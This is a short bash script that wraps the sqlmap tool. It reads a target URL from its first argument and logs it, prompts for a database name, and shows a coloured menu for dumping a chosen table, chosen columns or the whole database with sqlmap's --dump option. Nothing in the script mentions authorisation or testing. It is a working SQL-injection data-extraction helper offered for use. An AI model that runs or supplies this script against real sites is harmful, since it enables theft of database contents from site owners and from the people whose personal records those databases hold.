wog='\033[1;100m'
off='\033[0m'
fgr='\033[1;90m'
fr='\033[1;31m'
fg='\033[1;32m'
fy='\033[1;33m'
fb='\033[1;34m'
fp='\033[1;35m'
fs='\033[1;36m'
fw='\033[1;37m'
bow='\033[1;07m'
br='\033[0;41m'
bg='\033[0;42m'
by='\033[0;43m'
bb='\033[0;44m'
bp='\033[0;45m'
bs='\033[0;46m'
bw='\033[0;47m'
bk='\033[0;30m'
un='\033[0;04m'
it='\033[0;03m'



echo -e $fy"[>]enter database name : \c " $off
read d

cd /$HOME/sqlmap/outlog 
echo -e $fg "[*] site : $1 " >> log.txt 
echo -e $fb " database name : $d \n " >> log.txt 

echo -e $off 
echo -e $fg"[====> D U M P S E C T I O N <====]" $off
echo -e $wog"[=]    1. dump tables         [=]"  $off 
echo -e $wog"[=]    2. dump columns        [=]"  $off 
echo -e $wog"[=]    3. dump all            [=]"  $off 
echo -e $fg"[=============><==================]"$off 
echo -e $off 
echo -e $fr"[>] your choice : "$fy"\c" $off  
read c

  case $c in
  1) 
  echo -e $fp"[>] enter table name : " $fg"\c " $off 
  read ta
  sqlmap -u $1 --thread=5 -D $d -T $ta --dump
  ;;
  2)
  echo -e $fp"[>] enter table name : " $fg"\c " $off 
  read tb
  echo -e $fs"[>] enter column name : " $fg"\c " $off
  read co

  sqlmap -u $1 --thread=5 -D $d -T $tb -C $co --dump
  ;;
  3)
  sqlmap -u $1 --thread=5 -D $d --dump 
  ;;
  esac


